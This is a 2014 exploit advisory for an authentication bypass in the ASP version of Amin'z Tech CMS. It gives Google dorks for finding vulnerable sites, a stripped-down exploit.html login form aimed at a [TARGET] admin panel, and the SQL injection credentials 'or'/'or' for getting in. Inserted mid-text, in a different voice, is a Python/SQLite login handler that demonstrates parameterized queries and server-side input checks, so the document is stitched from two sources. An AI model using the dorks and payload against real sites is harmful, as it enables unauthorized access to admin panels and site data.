Thursday, 11 September 2014
Amin'z Tech CMS (asp) - Security bypassed & Auth bypass PoC Exploit
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact(onlymail) : knockout@e-mail.com.tr
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
############################################################
Turkey Security Group
'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Amin'z Tech CMS
|~Affected Version : ASP
|~Official Web: http://www.aminztech.com/
|~RISK : High
|~Google Keyword/Dorks :
"Developer by Amin' z Tech"
"Desgined By: Amin'z Tech" inurl:asp
|~Tested On : Kali Linux \ Windows XP
########################################################
####################INFO################################
The ASP version of the script is affected.
SQL queries can be sent to "panel/login.asp",
but there is a small problem...
The security in the "/panel/" source code is simple:
it does not accept special characters.
----------------------
...
Line 17: var iChars = "!@#$%^&*()+=-[]\\\';,./{}|\":<>?";
for (var i = 0; i < document.form2.uname.value.length; i++) {
if (iChars.indexOf(document.form2.uname.value.charAt(i)) != -1) {
alert ("Your Username has special characters. \nThese are not allowed.\n Please remove them and try again.");
return false;
..
..
-----------------
We will remove these checks and then be able to run SQL queries easily.
########################################################
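The check quoted above runs only in the visitor's browser, so the server has to enforce it again and bind the input as data. The following is an added example, not code from the advisory or from the CMS: a Python/SQLite stand-in for the login handler, where the table name, column names, sample account and function names are all assumptions.

```python
import hashlib
import hmac
import os
import sqlite3

# Same characters the page's client-side script rejects (its "Line 17" list).
FORBIDDEN = set("!@#$%^&*()+=-[]\\';,./{}|\":<>?")


def username_ok(uname):
    """Server-side copy of the browser check: it cannot be skipped by the client."""
    return 0 < len(uname) <= 64 and not (set(uname) & FORBIDDEN)


def hash_pw(password, salt):
    # Salted PBKDF2 so the table never holds plaintext passwords.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def make_db():
    """Constructed in-memory table with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (uname TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO admins VALUES (?, ?, ?)",
               ("admin", salt, hash_pw("constructed-password", salt)))
    return db


def login(db, uname, password, validate=True):
    if validate and not username_ok(uname):
        return False
    # The ? placeholder binds uname as a value; quotes in it never reach the SQL parser.
    row = db.execute("SELECT salt, pw_hash FROM admins WHERE uname = ?",
                     (uname,)).fetchone()
    # Hash even for unknown users so both paths do similar work.
    salt, stored = row if row else (b"\0" * 16, b"")
    matches = hmac.compare_digest(hash_pw(password, salt), stored)
    return matches and row is not None


if __name__ == "__main__":
    db = make_db()
    print(login(db, "admin", "constructed-password"))
    print(login(db, "'or'", "'or'"))
    print(login(db, "'or'", "'or'", validate=False))
```

The last call shows that parameter binding alone keeps the quoted input inert even with the character check switched off; the server-side check is a second layer, not the primary control.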
####################Usage Exploit########################
Exploitation
Edit exploit.html to point to the target website..
Open exploit.html in your browser..
Username : 'or'
Password : 'or'
GO TO ADMIN PANEL..
############################################################
Example affected sites & Tested on:
==============================================================================00
Admin Panel Security bypassed & auth bypass PoC ; exploit.html
==============================================================================00
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td> </td>
<td width="700" align="center"><form name="form2" id="form2" method="post" action="http://[TARGET]/panel/login.asp" onSubmit="return checkform();">
<table width="400" height="200" border="0" cellpadding="0" cellspacing="0">
<tr align="center">
<td height="30" colspan="3"><strong>Login Infromation</strong></td>
</tr>
<tr>
<td width="93"> </td>
<td width="92">User Name:</td>
<td width="215" height="26"> <input name="uname" type="text" class="textbox" id="uname"></td>
</tr>
<tr>
<td> </td>
<td>Password:</td>
<td height="26"> <input name="pass" type="password" class="textbox" id="pass">
</td>
</tr>
<tr>
<td> </td>
<td> </td>
<td height="30"> <input name="Submit" type="submit" class="btn" value="Login">
</td>
</tr>
<tr align="center" valign="top">
<td colspan="3" class="error"></td>
</tr>
</table>
</form></td>
<td> </td>
</tr>
</table>
</body>
</html>